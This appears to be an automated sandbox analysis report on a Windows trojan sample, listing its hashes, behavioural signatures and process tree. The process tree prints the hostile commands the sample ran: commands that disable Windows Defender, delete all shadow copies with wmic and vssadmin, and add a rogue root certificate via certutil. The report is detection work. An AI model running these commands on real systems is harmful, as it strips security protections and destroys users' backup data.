Analysis
-
max time kernel
151s -
max time network
93s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
01-08-2020 19:32
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe
Resource
win7v200722
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe
Resource
win10v200722
General
-
Target
SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe
-
Size
110KB
-
MD5
3af1d421410a6e528c93384a25437956
-
SHA1
db52c58a5791865071b17ec7403b8ac9bb9abb66
-
SHA256
0f6166d9b707f8610c81b7068962611e25cdef8db665b10343179d82131ef0a3
-
SHA512
7aa68ef3f9d4b4a5e38a04c35aef1579b95cc3f0d221e900cf59564e9366fc19aacc0896d7034c6b084234614b8810782b5cb99be07396cc1179b960a4f5e3a9
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1384 powershell.exe 1384 powershell.exe -
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exeREG.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend REG.exe -
Modifies Internet Explorer start page 1 TTPs 1 IoCs
Processes:
SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://www.globes.co.il/en/article-israeli-cyber-security-co-secdo-raises-10m-1001165259" SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe -
Runs net.exe
-
Modifies security service 2 TTPs 1 IoCs
Processes:
REG.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "2" REG.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exenet.exedescription pid process target process PID 1060 wrote to memory of 1292 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe net.exe PID 1060 wrote to memory of 1292 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe net.exe PID 1060 wrote to memory of 1292 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe net.exe PID 1060 wrote to memory of 1292 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe net.exe PID 1292 wrote to memory of 1296 1292 net.exe net1.exe PID 1292 wrote to memory of 1296 1292 net.exe net1.exe PID 1292 wrote to memory of 1296 1292 net.exe net1.exe PID 1292 wrote to memory of 1296 1292 net.exe net1.exe PID 1060 wrote to memory of 1384 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe powershell.exe PID 1060 wrote to memory of 1384 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe powershell.exe PID 1060 wrote to memory of 1384 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe powershell.exe PID 1060 wrote to memory of 1384 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe powershell.exe PID 1060 wrote to memory of 328 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe REG.exe PID 1060 wrote to memory of 328 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe REG.exe PID 1060 wrote to memory of 328 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe REG.exe PID 1060 wrote to memory of 328 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe REG.exe PID 1060 wrote to memory of 1036 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe wmic.exe PID 1060 wrote to memory of 1036 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe wmic.exe PID 1060 wrote to memory of 1036 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe wmic.exe PID 1060 wrote to memory of 1036 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe wmic.exe PID 1060 wrote to memory of 1796 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe vssadmin.exe PID 1060 wrote to memory of 1796 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe vssadmin.exe PID 1060 wrote to memory of 1796 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe vssadmin.exe PID 1060 wrote to memory of 1796 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe vssadmin.exe PID 1060 wrote to memory of 1628 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe certutil.exe PID 1060 wrote to memory of 1628 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe certutil.exe PID 1060 wrote to memory of 1628 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe certutil.exe PID 1060 wrote to memory of 1628 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe certutil.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
Processes:
powershell.exewmic.exevssvc.exeSecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exedescription pid process Token: SeDebugPrivilege 1384 powershell.exe Token: SeIncreaseQuotaPrivilege 1036 wmic.exe Token: SeSecurityPrivilege 1036 wmic.exe Token: SeTakeOwnershipPrivilege 1036 wmic.exe Token: SeLoadDriverPrivilege 1036 wmic.exe Token: SeSystemProfilePrivilege 1036 wmic.exe Token: SeSystemtimePrivilege 1036 wmic.exe Token: SeProfSingleProcessPrivilege 1036 wmic.exe Token: SeIncBasePriorityPrivilege 1036 wmic.exe Token: SeCreatePagefilePrivilege 1036 wmic.exe Token: SeBackupPrivilege 1036 wmic.exe Token: SeRestorePrivilege 1036 wmic.exe Token: SeShutdownPrivilege 1036 wmic.exe Token: SeDebugPrivilege 1036 wmic.exe Token: SeSystemEnvironmentPrivilege 1036 wmic.exe Token: SeRemoteShutdownPrivilege 1036 wmic.exe Token: SeUndockPrivilege 1036 wmic.exe Token: SeManageVolumePrivilege 1036 wmic.exe Token: 33 1036 wmic.exe Token: 34 1036 wmic.exe Token: 35 1036 wmic.exe Token: SeIncreaseQuotaPrivilege 1036 wmic.exe Token: SeSecurityPrivilege 1036 wmic.exe Token: SeTakeOwnershipPrivilege 1036 wmic.exe Token: SeLoadDriverPrivilege 1036 wmic.exe Token: SeSystemProfilePrivilege 1036 wmic.exe Token: SeSystemtimePrivilege 1036 wmic.exe Token: SeProfSingleProcessPrivilege 1036 wmic.exe Token: SeIncBasePriorityPrivilege 1036 wmic.exe Token: SeCreatePagefilePrivilege 1036 wmic.exe Token: SeBackupPrivilege 1036 wmic.exe Token: SeRestorePrivilege 1036 wmic.exe Token: SeShutdownPrivilege 1036 wmic.exe Token: SeDebugPrivilege 1036 wmic.exe Token: SeSystemEnvironmentPrivilege 1036 wmic.exe Token: SeRemoteShutdownPrivilege 1036 wmic.exe Token: SeUndockPrivilege 1036 wmic.exe Token: SeManageVolumePrivilege 1036 wmic.exe Token: 33 1036 wmic.exe Token: 34 1036 wmic.exe Token: 35 1036 wmic.exe Token: SeBackupPrivilege 1792 vssvc.exe Token: SeRestorePrivilege 1792 vssvc.exe Token: SeAuditPrivilege 1792 vssvc.exe Token: SeDebugPrivilege 1060 SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1796 vssadmin.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.StartPage1.57542.6255.20970.exe"1⤵
- Modifies Internet Explorer start page
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net.exe"net" stop WinDefend2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\REG.exe"REG" add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 2 /f2⤵
- Modifies service
- Modifies security service
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\certutil.exe"certutil" -addstore ROOT c:\windows\temp\MyEvilCert.cer2⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/328-5-0x0000000000000000-mapping.dmp
-
memory/1036-6-0x0000000000000000-mapping.dmp
-
memory/1292-0-0x0000000000000000-mapping.dmp
-
memory/1296-1-0x0000000000000000-mapping.dmp
-
memory/1384-2-0x0000000000000000-mapping.dmp
-
memory/1628-8-0x0000000000000000-mapping.dmp
-
memory/1796-7-0x0000000000000000-mapping.dmp